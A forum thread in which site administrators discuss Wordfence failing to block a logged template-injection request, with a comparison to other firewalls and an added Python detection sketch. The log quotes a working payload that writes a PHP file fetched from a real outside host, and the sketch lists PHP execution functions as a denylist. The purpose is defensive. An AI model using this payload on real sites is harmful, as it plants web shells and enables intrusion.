NOT BLOCKED - MISSED.
The urls don't exist, still this should have been blocked, since it is clearly a SQL/XSS injection attempt.
Our Imunify360 server-wide protection also missed that; I already know their reply from a previous incident: "why block a 404 url".
Ninja Firewall would have blocked that.
Recent Activity
Time: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:20 +0000 -- 1702993640.482122 in Unixtime
Seconds since last hit: 0.6399
URL: https: // removed /?tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt
Type: Page not found
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: China
Time: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:19 +0000 -- 1702993639.842247 in Unixtime
URL: https: // removed /?tag&tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt
Type: Normal request
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: China
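An added example, not part of the original thread and not Wordfence, Imunify360 or NinjaFirewall code: a sketch that scores the decoded query string of the logged request itself, so the verdict is the same whether the URL later resolves or returns 404. The rule names, the function denylist, the threshold of two rules and the placeholder hosts `site.example` and `payload.example` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed denylist: the two functions in the logged request plus common PHP execution sinks.
PHP_SINKS = {"file_put_contents", "file_get_contents", "eval", "assert",
             "system", "exec", "passthru", "shell_exec"}

# Each rule inspects one URL-decoded parameter value.
RULES = {
    "php_function_name": lambda v: v.strip().lower() in PHP_SINKS,
    "php_file_path": lambda v: re.search(r"\.php\d?$", v, re.I) is not None,
    "remote_url": lambda v: re.match(r"(?:https?|ftp)://", v, re.I) is not None,
    "inline_comment_padding": lambda v: re.search(r"/\*.*?\*/", v) is not None,
    "template_if_tag": lambda v: re.search(r"\{[^{}]*:if\(", v, re.I) is not None,
}

def findings(url):
    """Return the sorted names of the rules matched by any decoded query value."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits.update(rule for rule, check in RULES.items() if check(value))
    return sorted(hits)

def should_block(url, status_code, threshold=2):
    """Decide on the request alone. status_code is deliberately ignored:
    the request is scored before the application answers 200 or 404."""
    return len(findings(url)) >= threshold

# Constructed samples: the logged query string with placeholder hosts,
# and a benign search request that carries a URL in one parameter.
LOGGED = ("https://site.example/?tagstpl=about.html&tag=%7Bpbohome/Indexot:if("
          "(get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))"
          "%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php"
          "&t2=file_get_contents&t3=http://payload.example/d.txt")
BENIGN = "https://site.example/?s=about+us&redirect_to=https://site.example/shop"

if __name__ == "__main__":
    for url, status in ((LOGGED, 404), (BENIGN, 200)):
        print(status, should_block(url, status), findings(url))
```

The benign request matches only `remote_url`, which is why a single rule is not enough to block in this sketch.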
On the other hand, those have been blocked by THEIR firewall rules (their network rules):
Netherlands was blocked by firewall for WooCommerce Payments <= 5.6.1 Authentication Bypass and Privilege Escalation
IP: 45.154.98.137 Hostname: 45.154.98.137.powered.by.rdp.sh
and
Ukraine was blocked by firewall for N-Media Post Front-end Form < 1.1 - Arbitrary File Upload
IP: 194.38.22.71 Hostname: nbl216.ntup.net
Still, I don't use WooCommerce or any related plugin or that N-Media Post Front-end Form plugin.
So the blocks are more "precautionary" measures in this case, BUT in my first post .... the SQL/XSS (also 404) were not blocked as preventive measures.
I was under the impression that you used Ninja Firewall and not Wordfence :)
@maximus We were running Ninja Firewall for several years, after the fiasco of using The Shield plugin and getting hacked.
Ninja Firewall is an excellent and extremely FAST firewall, but it is missing some features we needed here. Like the ability to block a range of IPs, User Agents, Hostnames etc. Rate Limiting also is a great feature and along with the Live Traffic monitor, makes Wordfence a great choice for us.
The only thing I have disabled is Wordfence Scan, since it seems to create all kinds of problems and issues. Also Wordfence is not a lightweight plugin by any means.
Isn't that plugin heavy heavy for the DB and the CPUs?
The Scan was heavy on the server, but I haven't noticed anything after I disabled it. Just a 5%-8% on the overall system loading BUT I have several custom blocks (user agents and hostnames) on Wordfence (around 80). Also when we rate limit, we auto BLOCK the IP for a week and those IPs add up until cleared. So some DB usage going on all the time.